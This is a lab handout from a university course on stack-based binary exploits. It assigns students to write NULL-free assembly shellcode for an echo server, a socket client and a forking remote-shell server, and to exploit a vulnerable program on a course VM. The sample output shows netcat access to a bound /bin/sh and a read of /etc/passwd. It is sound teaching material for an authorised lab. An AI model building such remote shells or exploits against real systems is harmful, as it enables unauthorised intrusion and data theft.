SI485H: Stack Based Binary Exploits (SP17)


Home Policy Calendar Units Assignments Resources

Lab 09: Connect and Conquer

Submission Instructions

Submission instructions for labs can be found on the resource pages. In paticular, you should view this subsection: Creating a new branch and submitting

Part 1: The echo server says, "what", "what" (2 points)

Description

  • Modify the remote shell program in assembly such that now functions as an echo server. Whatever is read from the accpeted is written back.

Preamble

  • This assignment can be completed on your VM

Instructions

  • Your taks is to complete echo_server.asm such that it will execute an echo server on port 31337.
  • You echo server must accept incoming connections and be able to read from the sockets of strings of aribitrary length and write back aribitrary strings to the client.
  • Your assembly must be proper shell code in that it should not contain any NULL bytes and must be able to execute with the dummy_exploit program:

    ./dummy_exploit $(printf `./hexify.sh assembly_rsh`)
    
  • The code you must translate into assembly should be similar to the following:

    while( (r = read(client_sock, buf, 10)) > 0){
      if ( write(client_sock, buf, r) != r ){
        exit(3);
      }
     }
    exit(3);
    
  • When completed properly, you should be able to execute your echo server in one terminal like above. In another terminal, you can connect to the the server and get responses:

    user@si485H-base:~$ netcat localhost 31337
    short
    short
    looooooooooooooooong
    looooooooooooooooong
    very very very very very very very very very very very very very very loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong
    very very very very very very very very very very very very very very loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong
    ^D
    
  • When the client closes the connection with Ctrl-D (EOF), the echo serve should exit with status 3:

    user@si485H-base:8.1$ ./dummy_exploit $(printf `./hexify.sh echo_server`)
    user@si485H-base:8.1$ echo $?
    3
    

Submission

  • You must submit echo_server.asm

Hints

  • What are the return values of read() and write() and how can you condition on them?
  • You will need a loop

Part 2: The Bat Signal (3 points)

Description

  • modify the remote shell program such that it will funciton as a client and connect a service running on saddleback, read a message, and completely print that message to stdout.

Preamble

  • This assignment can be completed on your VM

Instructions

  • Your task is to complete the batman.asm program such that it will function as a socket client.
  • Your program will connect to saddleback.academy.usna.edu on port 47733.
  • Once connected, you will read the message from the server and print it to the screen. The result should be the bat signal, like below. You will probably want to read in a loop.

    MMMMMMMMMMMMMMMMMMMMM.                             MMMMMMMMMMMMMMMMMMMMM
    `MMMMMMMMMMMMMMMMMMMM           M\  /M           MMMMMMMMMMMMMMMMMMMM'
      `MMMMMMMMMMMMMMMMMMM          MMMMMM          MMMMMMMMMMMMMMMMMMM'  
        MMMMMMMMMMMMMMMMMMM-_______MMMMMMMM_______-MMMMMMMMMMMMMMMMMMM    
         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
        .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.    
       MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
                      `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'                
                             `MMMMMMMMMMMMMMMMMM'                    
                                 `MMMMMMMMMM'                              
                                    MMMMMM                              
                                     MMMM                                  
                                      MM
    
  • After reading the bat signal, if your program writes "go robin", you'll get an additional message from the server that should be printed to screen. It's an ASCII art robin :)
  • When completed, the output should be as such

    MMMMMMMMMMMMMMMMMMMMM.                             MMMMMMMMMMMMMMMMMMMMM
     `MMMMMMMMMMMMMMMMMMMM           M\  /M           MMMMMMMMMMMMMMMMMMMM'
       `MMMMMMMMMMMMMMMMMMM          MMMMMM          MMMMMMMMMMMMMMMMMMM'  
         MMMMMMMMMMMMMMMMMMM-_______MMMMMMMM_______-MMMMMMMMMMMMMMMMMMM    
          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
         .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.    
        MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
                       `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'                
                              `MMMMMMMMMMMMMMMMMM'                    
                                  `MMMMMMMMMM'                              
                                     MMMMMM                              
                                      MMMM                                  
                                       MM      
    
                       ___
                     .'``.``.
                 ___/ (o) `, `.
                '-==`,     ;   `.
                     \    :      `-.
                     /    ';        `.
                    /      .'         `.
                    |     (      `.     `-.._              
                     \     \` ` `. \         `-.._    
                      `.   ;`-.._ `-`._.-. `-._   `-._ 
                        `..'     `-.```.  `-._ `-.._.' 
                         `--..__..-`--'      `-.,'  
                          `._)`/                   
                           /  /          
                          /--(           
                      -./,--'`-,         
                   ,^--(                 
                    ,--' `-,
    

Submission

  • You must submit one file: batman.asm

Hints

  • connect() is a lot like a bind() and accept()
  • strace is a super useful debugging tool

Part 3: Don't fork bomb … 💥 Boom (2 Points)

Description

  • Modify the remote shell program such that it will funciton as multi-processor shell sever. Multiple clients can connect and access shells. This will be done through the fork() system call, where each new client connection will fork a new process which will start a remote shell.

Preamble

  • The assignment can be completed on your vm

Instructions

  • Your task is to complete the rsh_server.asm program such that it will execute a remote shell server on 31337 that can handle multiple clients, at the same time.
  • Your shell server must be able to accept incomping connections, and for each incoming connection, it will fork a new process which well execute a remote shell.
  • The remote shell will have all standard file descriptors duplicated onto the client socket and have "/bin/sh" executed via with execv() system call.
  • Your assembly must be proper shell code in that it should not contain any NULL bytes and must be able to execute with the dummyexploit program:

    ./dummy_exploit $(printf `./hexify.sh rsh_server`)
    
  • When completed properly, you should be able to execute your echo server in one terminal like above. In two terminals, simultanesouly, you can connect to the the server and get responses:

    user@si485H-base:~$ netcat localhost 31337
    ls  
    Makefile
    README.org
    README.org~
    dummy_exploit
    dummy_exploit.c
    hexify.sh
    rsh_server
    rsh_server.asm
    rsh_server.asm~
    rsh_server.o
    ^C
    user@si485H-base:~$ netcat localhost 31337
    cat /etc/passwd | grep root
    root:x:0:0:root:/root:/bin/bash
    ^C
    

Submission

  • You must submit at least one file: rsh_server.asm

Hints

  • Be quick on the killall trigger! Bugs have way of multiplying, exponentially.

PART 4: You closed stdin and stdout?!?! (2 points)

Description

  • Some crazy programmer closed stdin and stdout, but the code is still vulnerable via the command line args. Use your wits to launch a shell, retrieve a secret message, and write your name to the log file.

Preamble

  • This assignment must be completed on the clone-1 VM

    ssh -p 2201 saddleback.academy.usna.ed
    

Instructions

  • On the clone-1 VM you'll find a vulnerable program at

    ~aviv/labs/9.4/vulnerable
    
  • The program has an obvious vulnerability, but some programmer decided to close stdin and stdout to make it more secure! Clearly this was a great idea.
  • Once you've succesfully launched a shell, you'll find a secret message here:

    ~aviv/labs/9.4/secret.txt
    
  • Follow the instructions in the secret message to complete the lab.

Submissions

  • You must submit secret.txt with the instructions on what to do once your launch a shell
  • You must also follow those instructions

Hints

  • How could you possible get a shell without stdin and stdout?